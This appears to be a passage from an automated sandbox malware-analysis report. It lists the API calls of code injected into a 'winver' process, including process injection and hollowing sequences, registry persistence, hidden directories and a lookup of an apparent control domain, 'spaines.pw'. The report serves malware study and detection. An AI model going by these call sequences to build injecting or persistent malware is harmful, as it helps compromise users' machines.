                                                                                                                                                                                          • Instruction Fuzzy Hash: C04118B2500104AEEB11AF34C8C8BAA7BE9EF44744F058595EE45EF1C6DB309645EBB0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • inet_addr.WS2_32(00000000), ref: 02F02BDA
                                                                                                                                                                                          • gethostbyname.WS2_32(00000000), ref: 02F02BEE
                                                                                                                                                                                          • Sleep.KERNELBASE(00000001,?,452F5000,00000020), ref: 02F02C44
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleepgethostbynameinet_addr
                                                                                                                                                                                          • String ID: spaines.pw
                                                                                                                                                                                          • API String ID: 4125869991-3306378189
                                                                                                                                                                                          • Opcode ID: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                                          • Instruction ID: 11ad93942f5f0d145cc99894309973618758721f1849ba4dd87884ac732340ef
                                                                                                                                                                                          • Opcode Fuzzy Hash: a686e0a2577ad44437bb4935b9685bf0ba3a9ec673925458d8bfa502b5707883
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A31E671500210AEEB12AF20CCC8BAA77E9EF44754F048595EE45EF186EB30D644EBB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02F0086E: RegCreateKeyExA.KERNELBASE(00000000,02F00840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00876
                                                                                                                                                                                            • Part of subcall function 02F0086E: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 02F0089D
                                                                                                                                                                                            • Part of subcall function 02F0086E: RegCloseKey.KERNELBASE(?), ref: 02F008A9
                                                                                                                                                                                          • CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00900
                                                                                                                                                                                          Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: Create$CloseThreadValue
• String ID:
• API String ID: 711899537-0
• Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction ID: 6b977f34ed457e15f4c20ef090648430ee2c397755a1f380c93f7ee0a985d850
• Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
• Instruction Fuzzy Hash: 5731C5724002046FEB017B709DC5FAA77ADFF01384F44416AFE85DA0E1DE7449549AB9
Uniqueness

Uniqueness Score: -1.00%

APIs
• FindWindowA.USER32(02F00B57,0000000E), ref: 02F00B6A
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 02F00B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 02F00B84
  • Part of subcall function 02F00DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,02F00D88,00000000,0000090B,00000000), ref: 02F00E06
  • Part of subcall function 02F00DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 02F00E24
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 02F00BA6
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: Process$Window$AllocExitFindMemoryOpenThreadVirtualWrite
• String ID:
• API String ID: 3233011861-0
• Opcode ID: 1c0a6b39f04f013888fd52650cb507d7030a6be19416d1a6354875ae22fce905
• Instruction ID: ecb0910fccacfc5ebb33e7eb7b130a615956b6dfdf141d1c8f7b7dd66f099b81
• Opcode Fuzzy Hash: 1c0a6b39f04f013888fd52650cb507d7030a6be19416d1a6354875ae22fce905
• Instruction Fuzzy Hash: 0211B2616443416EEF112B709DD4F667F6A6F43784B1980ADEA45DE0E3EE20C806BA38
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000), ref: 02F0269E
• GetFileSize.KERNEL32(?,00000000), ref: 02F026B7
• ReadFile.KERNELBASE(02F0298A,?,00000000,?,00000000), ref: 02F026DB
• CloseHandle.KERNEL32(02F0298A), ref: 02F026EC
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: File$CloseCreateHandleReadSize
• String ID:
• API String ID: 3919263394-0
• Opcode ID: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
• Instruction ID: d70179389d6bfa9b4f9e6b356810d2dd97c340471ca8a65a2b3f05ab19294815
• Opcode Fuzzy Hash: 9ada69b04f3692008db521882e0968e7923ead0aff1f3c703ebe1070c1fb8f1c
• Instruction Fuzzy Hash: 4E01EC70A41209FFEF119FA0CC89B5D7AB5EF04B44F2041A9AE14F91E0D7709A20AF64
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 02F02715
• SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 02F02732
• WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 02F0274E
• CloseHandle.KERNEL32(?), ref: 02F0275F
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: File$CloseCreateHandlePointerWrite
• String ID:
• API String ID: 3604237281-0
• Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
• Instruction ID: 53c2aef1aa8b8afb0c3de7f99e9f61149e5926a5ad6f8450a541c680ed648f85
• Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
• Instruction Fuzzy Hash: 3001E830640209BFEF129FA0CC89F8D7EB4BF04B44F1041A9BF14B91E1D770AA21AB64
Uniqueness

Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(?,00000020,00000040,?), ref: 02F01372
• VirtualAlloc.KERNELBASE(00000000,00000020,00003000,00000040), ref: 02F01387
• VirtualProtect.KERNELBASE(?,00000020,?,?), ref: 02F013E5
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: Virtual$Protect$Alloc
• String ID:
• API String ID: 2541858876-0
• Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction ID: 93b1ab5daedebc82a863abebd8440accbbcee7e49ebc2c153ba2ed83f4eca2dc
• Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
• Instruction Fuzzy Hash: FA21AE31904216AFDF119F78C884B5EBBB6AF04340F054215FE59BB5D4DB30A800CB94
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 02F00B77
• OpenProcess.KERNEL32(001F0FFF,00000000), ref: 02F00B84
  • Part of subcall function 02F00DE0: VirtualAllocEx.KERNELBASE(?,00000000,00004F37,00003000,00000040,E8FFF41B,?,E900001B,02F00D88,00000000,0000090B,00000000), ref: 02F00E06
  • Part of subcall function 02F00DE0: WriteProcessMemory.KERNELBASE(?,-000008D9,00000000,00004F37,00000000), ref: 02F00E24
• ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 02F00BA6
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: Process$AllocExitMemoryOpenThreadVirtualWindowWrite
• String ID:
• API String ID: 2938372061-0
• Opcode ID: 1059d9524711834fbe5d8e118d96b44bb8c4a827e91fa872819f30df3597f232
• Instruction ID: 887e5636dd4efa8f018f9e5b2dbef78c1ea4e77a88298461d8887e5733e78a43
• Opcode Fuzzy Hash: 1059d9524711834fbe5d8e118d96b44bb8c4a827e91fa872819f30df3597f232
• Instruction Fuzzy Hash: E9E086B4A812412AFB103E618CC9F9A3E185F05799F080168FF85FE0D7DF60C1465634
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegCreateKeyExA.KERNELBASE(00000000,02F00840,0000002E,?,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00876
• RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,80000001,00000000), ref: 02F0089D
• RegCloseKey.KERNELBASE(?), ref: 02F008A9
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: CloseCreateValue
• String ID:
• API String ID: 1818849710-0
• Opcode ID: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
• Instruction ID: 30af9a2d2f5a90970354a76d8b3d716f8b80c703c301778db772b9ba412c6ae8
• Opcode Fuzzy Hash: 80521feeef5b5afe5d23b39b9eb1feefe2f3b5b0f1d0cfe90cf95d840a227002
• Instruction Fuzzy Hash: 80E09A72100004BFEF125F50DC89A997B75EF54745F1440A1FE4AAD075C7B14A60DF68
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02F00643: CreateMutexA.KERNELBASE(00000000,00000000), ref: 02F0065A
  • Part of subcall function 02F00643: LoadLibraryA.KERNELBASE(02F00673,00000009,?,00000000), ref: 02F00681
  • Part of subcall function 02F00643: lstrcmpiA.KERNEL32(?,00000000), ref: 02F006EB
  • Part of subcall function 02F00643: Sleep.KERNELBASE(00001388), ref: 02F006FE
  • Part of subcall function 02F00643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F0071F
  • Part of subcall function 02F00643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00731
  • Part of subcall function 02F00643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00752
  • Part of subcall function 02F00643: SetFileAttributesA.KERNELBASE(00000000,00000002), ref: 02F00764
  • Part of subcall function 02F00643: CreateDirectoryA.KERNELBASE(00000000,00000000,00000000), ref: 02F00785
• CreateThread.KERNELBASE(00001FE4,00001FE4,00000000,00000000,00000000,00000000,?,?,?,?,00000002,?,00000000,00000000), ref: 02F00900
  • Part of subcall function 02F00CE8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F00D07
  • Part of subcall function 02F00CE8: Sleep.KERNELBASE(000003E8), ref: 02F00D1D
  • Part of subcall function 02F00CE8: Process32First.KERNEL32(?,00000000), ref: 02F00D3D
  • Part of subcall function 02F00CE8: FindCloseChangeNotification.KERNELBASE(00000000,0000090B,00000000), ref: 02F00D88
  • Part of subcall function 02F00CE8: Process32Next.KERNEL32(?,?), ref: 02F00D9E
  • Part of subcall function 02F00CE8: FindCloseChangeNotification.KERNELBASE(?), ref: 02F00DCA
  • Part of subcall function 02F00CE8: Sleep.KERNELBASE(000003E8), ref: 02F00DD5
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create$DirectorySleep$AttributesChangeCloseFileFindNotificationProcess32$FirstLibraryLoadMutexNextSnapshotThreadToolhelp32lstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4243289212-0
                                                                                                                                                                                          • Opcode ID: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                                          • Instruction ID: 726dd8fdf586a0218687ef0333ab55de95550cc0fbe46f3b0b9a40072d7873fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: abfbc6871ba53161fe70b4bc33d47f3343101ac8d1b137fc9e23998c520ffae8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 66D05EA18141607DFB003FB08DD4B3B318EDF10380300853DBE85D91D5DD304A44AD76
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• CryptAcquireContextA.ADVAPI32(00000000,00000000,02F02DA0,0000002F,?,00000000,00000001,F0000000), ref: 02F02DE0
• CryptImportPublicKeyInfo.CRYPT32(?,00000001,?,00000000), ref: 02F02E06
• CryptCreateHash.ADVAPI32(?,00008004,00000000,00000000,00000000), ref: 02F02E29
• CryptHashData.ADVAPI32(?,00000080,00000080,00000000), ref: 02F02E43
• CryptVerifySignatureA.ADVAPI32(?,02F02A30,02F02A2C,?,00000000,00000000), ref: 02F02E63
• CryptDestroyHash.ADVAPI32(?), ref: 02F02E71
• CryptDestroyKey.ADVAPI32(?), ref: 02F02E7D
• CryptReleaseContext.ADVAPI32(?,00000000), ref: 02F02E8B
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportInfoPublicReleaseSignatureVerify
• String ID:
• API String ID: 295346115-0
• Opcode ID: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
• Instruction ID: d4d837671d06ee331a39c9e97226c1564ee5ea46e6c1a4b8e2faa1060939f024
• Opcode Fuzzy Hash: 8daccd83c1521e93d6aa3a18378ac6c6e3e6a1207c5cbc88546a17831c3b5411
• Instruction Fuzzy Hash: A0111C31640115BBEF221F20CC89BD97B75AF54B44F1441D4BE8ABD0A4DBB189A0DF68
Uniqueness
Uniqueness Score: -1.00%

APIs
• Sleep.KERNEL32(00001388), ref: 02F00959
• RtlExitUserThread.NTDLL(00000000), ref: 02F00961
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02F00981
• GetStartupInfoA.KERNEL32(00000000), ref: 02F00999
  • Part of subcall function 02F009D9: CreateProcessA.KERNEL32(00000000,02F009D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02F009E0
  • Part of subcall function 02F009D9: GetThreadContext.KERNEL32(?,00000000), ref: 02F00A08
  • Part of subcall function 02F009D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02F00A33
  • Part of subcall function 02F009D9: DuplicateHandle.KERNEL32(000000FF,000000FF,?,02F05810,00000000,00000000,00000002), ref: 02F00A78
  • Part of subcall function 02F009D9: WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02F00AA6
  • Part of subcall function 02F009D9: ResumeThread.KERNEL32(?), ref: 02F00AB6
  • Part of subcall function 02F009D9: Sleep.KERNEL32(000003E8), ref: 02F00AC6
  • Part of subcall function 02F009D9: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02F00ADD
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: Thread$MutexOpenProcessSleep$ContextCreateDuplicateExitHandleInfoMemoryProtectResumeStartupUserVirtualWrite
• String ID:
• API String ID: 1099281029-0
• Opcode ID: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
• Instruction ID: dcd3a9327c4e4865b9b664304a324d077dac97abf37f275efd2f199f5cc6345f
• Opcode Fuzzy Hash: 5d03330d33b3b27a40e3269c6242ef1dc1a02b5c5defd31e13463acd8d2fdf85
• Instruction Fuzzy Hash: E551A1316442549FEF226F60CCC5B9A77B8AF04784F0401D9BB49FE0D6DBB09690DB65
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrcat.KERNEL32(00000000,00000000), ref: 02F034A2
• lstrcat.KERNEL32(00000000,02F034AD), ref: 02F034B1
• Process32Next.KERNEL32(00000000,00000000), ref: 02F034C2
• lstrlen.KERNEL32(00000000), ref: 02F034CD
  • Part of subcall function 02F0276C: VirtualAlloc.KERNEL32(00000000,03E80005,00003000,00000004,?,00000000), ref: 02F02787
  • Part of subcall function 02F0276C: lstrcat.KERNEL32(00000000,02F027D1), ref: 02F027E0
  • Part of subcall function 02F0276C: VirtualFree.KERNEL32(-00000005,00000000,00008000,00000000,-00000005,03E80005,00000004,?,00000000), ref: 02F02805
• VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,000000C9), ref: 02F034E7
• CloseHandle.KERNEL32(00000000), ref: 02F034EE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: Virtuallstrcat$Free$AllocCloseHandleNextProcess32lstrlen
• String ID: W
• API String ID: 1406046206-655174618
• Opcode ID: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
• Instruction ID: e28e044440cf7968e713f2b41323bed6f7bcb9deb3b66f1be5b2db58308b29e9
• Opcode Fuzzy Hash: c8fa19f9968db6785e07a1955e6f0d7ff49f84e83013956b77b58b1155eecca2
• Instruction Fuzzy Hash: 96F03175105510AEEB136F608CC8FBE3AA8AF41745F040099FE85FD099DB6441159A69
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,02F009D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 02F009E0
• GetThreadContext.KERNEL32(?,00000000), ref: 02F00A08
• VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 02F00A33
• DuplicateHandle.KERNEL32(000000FF,000000FF,?,02F05810,00000000,00000000,00000002), ref: 02F00A78
• WriteProcessMemory.KERNEL32(?,?,?,000000EB,00000000), ref: 02F00AA6
• ResumeThread.KERNEL32(?), ref: 02F00AB6
• Sleep.KERNEL32(000003E8), ref: 02F00AC6
• OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 02F00ADD
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: ProcessThread$ContextCreateDuplicateHandleMemoryMutexOpenProtectResumeSleepVirtualWrite
• String ID:
• API String ID: 617592159-0
• Opcode ID: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
• Instruction ID: 868f59966f274d87727562696791e7a8c80f8d2e166e7d36953146412101e73e
• Opcode Fuzzy Hash: cb1a56bbf55a9609519a9d5e117579c9d2b8a90392855b77a87fbfe701f84b21
• Instruction Fuzzy Hash: AE3150316402549FEF229F51CCC5BAA77B9FF04784F0801D8AA49FE0E5DBB09690DE64
Uniqueness
Uniqueness Score: -1.00%

APIs
• ExpandEnvironmentStringsA.KERNEL32(02F02525,00000010,?,?,02F029F8,00000104), ref: 02F0253A
  • Part of subcall function 02F02572: lstrcat.KERNEL32(02F029F8,02F02553), ref: 02F0257A
  • Part of subcall function 02F02572: lstrcat.KERNEL32(02F029F8,00000000), ref: 02F0258D
• ExpandEnvironmentStringsA.KERNEL32(02F025BB,0000000B,?,00000000,02F02634,00000104), ref: 02F025CB
• lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
Memory Dump Source
• Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
Similarity
• API ID: lstrcat$EnvironmentExpandStrings
• String ID:
• API String ID: 2903145849-0
• Opcode ID: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
• Instruction ID: 2fa53948d3ee99fb269187e9e6a80ea0357af8f51f0779cf932a715a6c52c68d
• Opcode Fuzzy Hash: 815612cc5c30cec6fa8ba0fbaeab2fe1927bb25e379c814d3d0a7115e2d1fffc
• Instruction Fuzzy Hash: AB31DB711482819FDB039FA0CCAA9ED7B68FF42344B0840AAEE85DE0A3D6744557DFB5
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 02F02597: lstrcat.KERNEL32(02F02634,00000000), ref: 02F025DE
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02F031EA
                                                                                                                                                                                            • Part of subcall function 02F026F9: CreateFileA.KERNELBASE(?,40000000,00000003,00000000,?,00000080,00000000,?,00000000), ref: 02F02715
                                                                                                                                                                                            • Part of subcall function 02F026F9: SetFilePointer.KERNELBASE(?,00000000,00000000,00000002), ref: 02F02732
                                                                                                                                                                                            • Part of subcall function 02F026F9: WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000), ref: 02F0274E
                                                                                                                                                                                            • Part of subcall function 02F026F9: CloseHandle.KERNEL32(?), ref: 02F0275F
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(00000000), ref: 02F03228
                                                                                                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,02F031B5,00000011,?,00000000,00000000), ref: 02F03255
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,02F031B5,00000011,?,00000000,00000000,00000000,02F0306E,00000004,00000000), ref: 02F03261
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,02F031B5,00000011,?,00000000,00000000,00000000,02F0306E,00000004,00000000), ref: 02F0326D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFileHandle$Createlstrcat$InfoPointerProcessStartupWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1477093598-0
                                                                                                                                                                                          • Opcode ID: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                                          • Instruction ID: 3b2aa8d050f53153ff6ac6c724ea38c1300bc23a2201db070bac4ae2400b18fb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 52ca7a41ac4a32d2a2c9c3052bde0af75adf02ba36e72263bc001af510b0aaac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0F1166729049189FDF126F60CC88FAFB7BDEF40345F0144A9EA85E6044DB305A80DFA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F0344D
                                                                                                                                                                                          • Process32First.KERNEL32(00000000,00000000), ref: 02F03473
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00003000,00000004), ref: 02F0348B
                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02F034A2
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02F034EE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocCloseCreateFirstHandleProcess32SnapshotToolhelp32Virtuallstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1167326197-0
                                                                                                                                                                                          • Opcode ID: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                                          • Instruction ID: 86ceee540d0b1a2f8b4cc0fffea335cc1019a1bccc84911e1fbc5bba0a0aaec7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f9d1eb2edb9076798b234430a1619a4ded5de1aa51cd46c1ede4133039d73f4
                                                                                                                                                                                          • Instruction Fuzzy Hash: CE0126706412106FFB635A308CC9BAA36ECEF00795F0401E8FE44FE0D5DF7488158A69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02F03F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 02F03F2D
                                                                                                                                                                                          • Sleep.KERNEL32(000003E8,00000000,?,02F03F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 02F03F4B
                                                                                                                                                                                          • Sleep.KERNEL32(000007D0), ref: 02F03F5B
                                                                                                                                                                                          • Sleep.KERNEL32(00000BB8), ref: 02F03F6B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Sleep$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3646095425-0
                                                                                                                                                                                          • Opcode ID: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                                          • Instruction ID: 885f389de0fb3a83ad8f29d176fcc8b20af944eda94721dbe7e846062eec785a
                                                                                                                                                                                          • Opcode Fuzzy Hash: ab11c2741b2bf6d40620f8a1c1d83e6402f3f97ec40c804351164b00e2b9bff0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9FF01C74988240AAEF543BB08CCDA5936B9AF407C6F0405D1EB89BD0E4DE70A550AF75
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(02F03EBD,00000006,E8FFFE1B,00000000), ref: 02F03EC8
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,02F03F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 02F03F2D
                                                                                                                                                                                            • Part of subcall function 02F00C9C: GetProcAddress.KERNEL32(02F02811,02F0290A), ref: 02F00CA9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.2899936580.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_2f00000_winver.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                          • String ID: j
                                                                                                                                                                                          • API String ID: 310444273-2747090070
                                                                                                                                                                                          • Opcode ID: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                                          • Instruction ID: 2931ce148716d4bd257f4e29155a6422e763f967167744f23e47729518b346d3
                                                                                                                                                                                          • Opcode Fuzzy Hash: efa1dc669fdda1affb635a68a859d1326d4b89420978e385a295ff765e4871df
                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F06875608250ADEF166AB08CC4FAA32BDAF407C6F0440D5EB85E90C4DE309544FFB6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:8%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:2.6%
                                                                                                                                                                                          Total number of Nodes:193
                                                                                                                                                                                          Total number of Limit Nodes:20

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
